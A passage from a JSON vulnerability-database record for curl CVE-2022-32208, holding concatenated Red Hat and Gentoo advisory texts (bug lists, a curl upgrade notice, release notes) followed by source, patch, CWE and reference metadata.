Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/\n\nSecurity fixes:\n\n* moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* Submariner Globalnet e2e tests failed on MTU between On-Prem to Public\nclusters (BZ# 2074547)\n\n* OCP 4.11 - Install fails because of: pods\n\"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate\nagainst any security context constrain (BZ# 2082254)\n\n* subctl gather fails to gather libreswan data if CableDriver field is\nmissing/empty in Submariner Spec (BZ# 2083659)\n\n* Yaml editor for creating vSphere cluster moves to next line after typing\n(BZ# 2086883)\n\n* Submariner addon status doesn\u0027t track all deployment failures (BZ#\n2090311)\n\n* Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn\nwithout including s3 secret (BZ# 2091170)\n\n* After switching to ACM 2.5 the managed clusters log \"unable to create\nClusterClaim\" errors (BZ# 2095481)\n\n* Enforce failed and report the violation after modified memory value in\nlimitrange policy (BZ# 2100036)\n\n* Creating an application fails with \"This application has no subscription\nmatch selector (spec.selector.matchExpressions)\" (BZ# 2101577)\n\n* Inconsistent cluster resource statuses between \"All Subscription\"\ntopology and individual topologies (BZ# 2102273)\n\n* managed cluster is in \"unknown\" state for 120 mins after OADP restore\n\n* RHACM 2.5.2 images (BZ# 2104553)\n\n* Subscription UI does not allow binding to label with empty value (BZ#\n2104961)\n\n* Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ#\n2106069)\n\n* Region information is not available for Azure cloud in managedcluster CR\n(BZ# 2107134)\n\n* cluster uninstall log points to incorrect container name (BZ# 2107359)\n\n* ACM shows wrong path for Argo CD applicationset git generator (BZ#\n2107885)\n\n* Single node checkbox not visible for 4.11 images (BZ# 2109134)\n\n* Unable to deploy hypershift cluster when enabling\nvalidate-cluster-security (BZ# 2109544)\n\n* Deletion of Application (including app related resources) from the\nconsole fails to delete PlacementRule for the application (BZ# 20110026)\n\n* After the creation by a policy of job or deployment (in case the object\nis missing)ACM is trying to add new containers instead of updating (BZ#\n2117728)\n\n* pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)\n\n* ArgoCD and AppSet Applications do not deploy to local-cluster (BZ#\n2124707)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters\n2082254 - OCP 4.11 - Install fails because of: pods \"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate against any security context constraint\n2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec\n2086883 - Yaml editor for creating vSphere cluster moves to next line after typing\n2090311 - Submariner addon status doesn\u0027t track all deployment failures\n2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret\n2095481 - After switching to ACM 2.5 the managed clusters log \"unable to create ClusterClaim\" errors\n2100036 - Enforce failed and report the violation after modified memory value in limitrange policy\n2101577 - Creating an application fails with \"This application has no subscription match selector (spec.selector.matchExpressions)\"\n2102273 - Inconsistent cluster resource statuses between \"All Subscription\" topology and individual topologies\n2103653 - managed cluster is in \"unknown\" state for 120 mins after OADP restore\n2104553 - RHACM 2.5.2 images\n2104961 - Subscription UI does not allow binding to label with empty value\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD\n2107134 - Region information is not available for Azure cloud in managedcluster CR\n2107359 - cluster uninstall log points to incorrect container name\n2107885 - ACM shows wrong path for Argo CD applicationset git generator\n2109134 - Single node checkbox not visible for 4.11 images\n2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application\n2117728 - After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating\n2122292 - pods in CrashLoopBackoff on 3.11 managed cluster\n2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32208"
},
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32208",
"trust": 1.9
},
{
"db": "HACKERONE",
"id": "1590071",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "168289",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168503",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168378",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168158",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168284",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167661",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168174",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167607",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168347",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168301",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-424135",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-32208",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"id": "VAR-202206-1961",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:24:46.149000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Ubuntu Security Notice: USN-5499-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5499-1"
},
{
"title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32208"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32208"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-840",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/28"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.1,
"url": "https://hackerone.com/reports/1590071"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-29154"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-2526"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.2,
